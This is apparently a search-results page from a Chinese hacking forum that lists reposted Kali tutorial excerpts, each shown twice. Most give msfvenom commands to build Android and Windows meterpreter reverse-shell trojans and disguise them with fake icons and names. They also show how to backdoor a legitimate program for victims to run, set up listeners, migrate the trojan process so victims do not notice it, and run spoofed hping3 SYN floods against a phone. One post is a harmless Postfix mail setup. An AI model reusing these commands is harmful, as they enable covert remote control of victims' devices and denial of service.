跳转到帖子

搜索论坛

显示结果为标签'msfconsole'、'基础教程'或'kali工具'。

  • 用标签来搜索

    用逗号分隔标签类型
  • 用作者来搜索

内容类型


论坛

  • 漏洞与黑客攻击防御安全领域
    • 黑客攻防业务合作
    • 世界黑客新闻动态
    • WEB和服务器安全漏洞
    • CHT漏洞数据库
    • Linux Kali高级学习教程
    • CTF&密码学与社会工程
    • 木马病毒分析
    • 黑客世界会员中心
  • 问题讨论中心
    • 问答中心
    • 交流中心
  • 编程开发
    • 各种编程技术
    • ios /安卓开发
  • CHT官方团队介绍及比赛制度
    • CTF攻防系统[供会员使用]
    • 积分商场
    • 积分跳马系统
    • 积分统计系统

产品组

  • Hacker attack and defense security hardware series
  • Internet Security Book Recommendations

博客

没有结果。

没有结果。

类别

  • Hacker Attack and Defense & Network Security Videos

查找结果在…

查找包含的结果…


创建日期

  • 开始

    结束


最后更新

  • 开始

    结束


按数量过滤…

注册日期

  • 开始

    结束


用户组


About Me

找到12个结果

  1. 一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/184.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  2. 一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/184.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  3. 一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  4. 一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  5. 介绍我有一台Ubuntu服务器,上面运行了若干应用。我希望某个应用崩溃或出问题的时候,系统后台自动把故障信息发到我的邮箱。这样,免去了我远程登录服务器,查看运行故障日志的烦恼。此处仅需要服务器能发送邮件即可,不需收取邮件。 Postfix是Linux平台上应用广泛的邮件系统。本文中将在Ubuntu平台上安装配置Postfix,实现发送邮件功能。 步骤一:安装Postfix首先更新软件包: sudo apt-get update然后安装Mailutils(Postfix在该包中): sudo apt-get install mailutils安装中首先会出现问题请你确认,选择Y Do you want to continue?[Y/n] 在确认配置页面,tab至ok,回车: 以下配置页面共5个选项,我们选择默认选项Internet Site: 下面的配置页面是输入系统邮件名字,保持默认: 步骤二:配置PostfixPostfix需要在配置中监听loopbackinterface,打开主Postfix配置文件: sudo vi /etc/postfix/main.cf将inet_interfaces = all更为inet_interfaces = loopback-only,保存退出。 重启Postfix: sudo service postfix restart步骤三:测试发送邮件echo "测试邮件正文" | mail -s "邮件标题" your_email_address 用你的邮箱地址代替your_email_address。 怎么样,能收到吗?如果你的服务器只有Ip地址,没有对应的域名,很可能你也像我一样收不到邮件。因为此处发出的邮件默认发件地址为:你登录服务器的用户名@你服务器的名字,像我的地址就为user1@svr5。而绝大部分收件人的邮件服务器会对发件电子邮件地址有效性做出判断,如果不与常规域名后缀(如xxx.com, xxx.net等等)一致,会判定为垃圾邮件而丢弃。所以,我们需要进入步骤四。 步骤四:改变发件地址打开Postfix配置文件: sudo vi /etc/postfix/main.cf在文件末尾增加以下内容: smtp_generic_maps = hash:/etc/postfix/generic保存退出。打开以下文件: sudo vi /etc/postfix/generic添加以下内容: 你的用户名@你的服务器名字 你希望对方看到的电子邮件地址 如我在服务器登录用户名为user1,我的服务器名字为svr5,我希望对方看到的电子邮件地址为user@126.com,那么添加内容为: user1@svr5 user@126.com 如果你希望对方回复,user@126.com应该是你希望收到回复邮件的地址。如果不希望对方回复,那么这个地址可以不一定为真实地址,但格式要符合邮件地址要求,否则会被对方邮件服务器丢弃。 重启Postfix: sudo service postfix restart再试试,能收到邮件了吗? echo "测试邮件正文" | mail -s "邮件标题" your_email_address OK. 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/332.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  6. 介绍我有一台Ubuntu服务器,上面运行了若干应用。我希望某个应用崩溃或出问题的时候,系统后台自动把故障信息发到我的邮箱。这样,免去了我远程登录服务器,查看运行故障日志的烦恼。此处仅需要服务器能发送邮件即可,不需收取邮件。 Postfix是Linux平台上应用广泛的邮件系统。本文中将在Ubuntu平台上安装配置Postfix,实现发送邮件功能。 步骤一:安装Postfix首先更新软件包: sudo apt-get update然后安装Mailutils(Postfix在该包中): sudo apt-get install mailutils安装中首先会出现问题请你确认,选择Y Do you want to continue?[Y/n] 在确认配置页面,tab至ok,回车: 以下配置页面共5个选项,我们选择默认选项Internet Site: 下面的配置页面是输入系统邮件名字,保持默认: 步骤二:配置PostfixPostfix需要在配置中监听loopbackinterface,打开主Postfix配置文件: sudo vi /etc/postfix/main.cf将inet_interfaces = all更为inet_interfaces = loopback-only,保存退出。 重启Postfix: sudo service postfix restart步骤三:测试发送邮件echo "测试邮件正文" | mail -s "邮件标题" your_email_address 用你的邮箱地址代替your_email_address。 怎么样,能收到吗?如果你的服务器只有Ip地址,没有对应的域名,很可能你也像我一样收不到邮件。因为此处发出的邮件默认发件地址为:你登录服务器的用户名@你服务器的名字,像我的地址就为user1@svr5。而绝大部分收件人的邮件服务器会对发件电子邮件地址有效性做出判断,如果不与常规域名后缀(如xxx.com, xxx.net等等)一致,会判定为垃圾邮件而丢弃。所以,我们需要进入步骤四。 步骤四:改变发件地址打开Postfix配置文件: sudo vi /etc/postfix/main.cf在文件末尾增加以下内容: smtp_generic_maps = hash:/etc/postfix/generic保存退出。打开以下文件: sudo vi /etc/postfix/generic添加以下内容: 你的用户名@你的服务器名字 你希望对方看到的电子邮件地址 如我在服务器登录用户名为user1,我的服务器名字为svr5,我希望对方看到的电子邮件地址为user@126.com,那么添加内容为: user1@svr5 user@126.com 如果你希望对方回复,user@126.com应该是你希望收到回复邮件的地址。如果不希望对方回复,那么这个地址可以不一定为真实地址,但格式要符合邮件地址要求,否则会被对方邮件服务器丢弃。 重启Postfix: sudo service postfix restart再试试,能收到邮件了吗? echo "测试邮件正文" | mail -s "邮件标题" your_email_address OK. 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/332.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  7. 在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。首先我们生成一个木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。 启动msfconsole并设置参数use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.195 set LPORT 5555 exploit运行软件,成功获得shell 转移进程首先命令ps查看当前windows下运行的进程有哪些。 这时,我们要记录下要转移程序的pid值 比如,我想我木马的进程转移到txt文档程序下。执行下面命令。 migrate 6296 使用 espiause espia 这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/531.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  8. 在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。首先我们生成一个木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。 启动msfconsole并设置参数use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.195 set LPORT 5555 exploit运行软件,成功获得shell 转移进程首先命令ps查看当前windows下运行的进程有哪些。 这时,我们要记录下要转移程序的pid值 比如,我想我木马的进程转移到txt文档程序下。执行下面命令。 migrate 6296 使用 espiause espia 这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/531.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  9. 攻击过程:你使用hping3执行拒绝服务攻击(即DoS)。你隐藏你的a$$(我是指你的源头IP地址)。你的目标机器看到的将是随机性源头IP地址中的源头,而不是你的IP地址(IP伪装)。你的目标机器会在5分钟里面不堪重负,停止响应。ok,我们进行简单的模拟攻击: 先用nmap扫描内网存活主机 nmap -sP 192.168.1.1/24 我们的攻击目标是智能手机。 输入命令hping -S --flood -V IP 开始攻击 我们来看看攻击的效果 ok 这时候 手机已经呈现断网状态 按下ctrl+c关闭,这时候我们看看发送了多少数据 这个数据包很客观的了。 另外就是隐藏IP攻击目标 命令是这样的: hping3 -S -U --flood -V --rand -source IP怎样防止DOS攻击如果是网站,可以让网站接入CDN加速。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/712.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  10. 攻击过程:你使用hping3执行拒绝服务攻击(即DoS)。你隐藏你的a$$(我是指你的源头IP地址)。你的目标机器看到的将是随机性源头IP地址中的源头,而不是你的IP地址(IP伪装)。你的目标机器会在5分钟里面不堪重负,停止响应。ok,我们进行简单的模拟攻击: 先用nmap扫描内网存活主机 nmap -sP 192.168.1.1/24 我们的攻击目标是智能手机。 输入命令hping -S --flood -V IP 开始攻击 我们来看看攻击的效果 ok 这时候 手机已经呈现断网状态 按下ctrl+c关闭,这时候我们看看发送了多少数据 这个数据包很客观的了。 另外就是隐藏IP攻击目标 命令是这样的: hping3 -S -U --flood -V --rand -source IP怎样防止DOS攻击如果是网站,可以让网站接入CDN加速。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/712.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  11. Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~ 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/1263.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  12. Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~ 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/1263.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    ×
    ×
    • 创建新的...